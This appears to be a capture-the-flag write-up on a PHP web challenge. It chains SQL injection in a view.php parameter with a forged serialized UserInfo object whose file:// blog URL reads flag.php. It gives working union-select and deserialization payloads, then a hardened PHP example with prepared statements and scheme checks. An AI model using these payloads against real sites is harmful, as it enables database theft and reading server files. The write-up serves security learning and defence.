1. Register an account on facebook to test
http://****:8306/view.php?no=12%27
Appending %27 (a single quote ') produces an error
[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)
Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66
Check the source code
2. Directory scan with dirsearch
python3 dirsearch.py -u http://*:8306/ -e php
/robots.txt
Visit /robots.txt
User-agent: *
Disallow: /user.php.bak
View the contents of user.php.bak
3. SSRF with the file:// protocol: the blog field is validated by a regular expression that restricts its format, so it cannot be injected there
4. http://*:8306/view.php?no=12
http://*:8306/view.php?no=12%27
+and+1=1 -> page normal
+and+1=2 -> page abnormal
can also be written as: and 1=2
Fatal error: Call to a member function getBlogContents() on boolean in /var/www/html/view.php on line 67
no=12 order by 4
http://*:8306/view.php?no=12%20order%20by%204
3 succeeds, 5 fails, so there are only 4 columns
%20 is a URL-encoded space
The following can be seen: no, username, passwd, data, USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS
Look at the data column in detail
no=-1/**/union/**/select/**/1,group_concat(data),3,4%20from%20users%20where%20no=%2712%27%20#
Typical JSON-style data
A field with length 8, and 3 variables: name, age, blog
Go back to user.php.bak and look at it
public function getBlogContents ()
{
return $this->get($this->blog);
}
Based on the above, we determine that this is deserialization
Format reference: O:8:"UserInfo":3 (object, class name of length 8, 3 properties)
O:8:"UserInfo":3:{s:4:"name";s:2:"zz";s:3:"age";i:1;s:4:"blog";s:20:"http://www.baidu.com";}
<?php
// Rebuild the UserInfo object from the serialized string seen in the data column
$u = unserialize('O:8:"UserInfo":3:{s:4:"name";s:2:"zz";s:3:"age";i:1;s:4:"blog";s:20:"http://www.baidu.com";}');
$s = $u;
// Change the blog property, then serialize again to get the new string
$s->blog = 'file:///var/www/html/flag.php';
print(serialize($s));
Append this to the end of the existing file and run it directly to obtain the string above
http://*:8306/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"s1";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
src="data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tBNTE2OEI2My00MjEzLTREOTItQkM4OC0yNkY5MzRBN0JCN0J9IjsNCmV4aXQoMCk7DQo="
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tBNTE2OEI2My00MjEzLTREOTItQkM4OC0yNkY5MzRBN0JCN0J9IjsNCmV4aXQoMCk7DQo=
<?php
$flag = "flag{A5168B63-4213-4D92-BC88-26F934A7BB7B}";
exit(0);
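The writeup above chains two defects: the no parameter is concatenated into the SQL query, and the blog property of the deserialized UserInfo object is fetched without checking its scheme, so a file:// URL reads flag.php. The block below is an added example of how the same view.php / UserInfo flow can be hardened; it is not the challenge's own code. It assumes a mysqli connection $conn, a users table with the columns no and data seen on the page, and that data holds the serialized UserInfo object; the helper names isSafeBlogUrl and loadUser and the curl-based fetch are assumptions.

```php
<?php
// Added example (not the challenge's code): hardened UserInfo and user lookup.
// Assumes a mysqli connection $conn and a users table with columns no and data.

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    // Only plain http/https URLs with a host are fetched; file://, php://, gopher://
    // and any other wrapper are rejected before a request is made.
    private function isSafeBlogUrl(string $url): bool
    {
        $parts = parse_url($url);
        if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
            return false;
        }
        if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
            return false;
        }
        // Refuse hosts that resolve to private or reserved ranges so the server
        // cannot be used to reach internal services. This is a best-effort check:
        // DNS rebinding can still change the answer between check and fetch.
        $ip = gethostbyname($parts['host']);
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;
    }

    public function getBlogContents(): string
    {
        if (!$this->isSafeBlogUrl($this->blog)) {
            return "blog URL rejected";
        }
        $ch = curl_init($this->blog);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // Restrict curl itself to http/https as a second layer, including on redirects.
        curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $body = curl_exec($ch);
        curl_close($ch);
        return $body === false ? "" : $body;
    }
}

// Parameterized lookup: the no parameter never becomes part of the query text,
// so "order by" and "union select" fragments are just a non-numeric value.
function loadUser(mysqli $conn, string $noParam): ?UserInfo
{
    if (!ctype_digit($noParam)) {
        return null;
    }
    $stmt = $conn->prepare("SELECT data FROM users WHERE no = ?");
    $no = (int)$noParam;
    $stmt->bind_param("i", $no);
    $stmt->execute();
    $stmt->bind_result($data);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return null;
    }
    // Limit unserialize to the one class expected here; any other class name
    // becomes __PHP_Incomplete_Class instead of a live object.
    $u = unserialize($data, ['allowed_classes' => ['UserInfo']]);
    return $u instanceof UserInfo ? $u : null;
}

// Assumed usage in view.php:
// $user = loadUser($conn, $_GET['no'] ?? '');
// echo $user ? $user->getBlogContents() : 'not found';
```

With the prepared statement in place the injected serialized object from the union payload above never reaches unserialize, and even a stored blog value of file:///var/www/html/flag.php is refused by the scheme check before curl runs. Storing the profile as JSON and decoding it with json_decode instead of unserialize would remove the deserialization surface entirely.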
reissue request scripter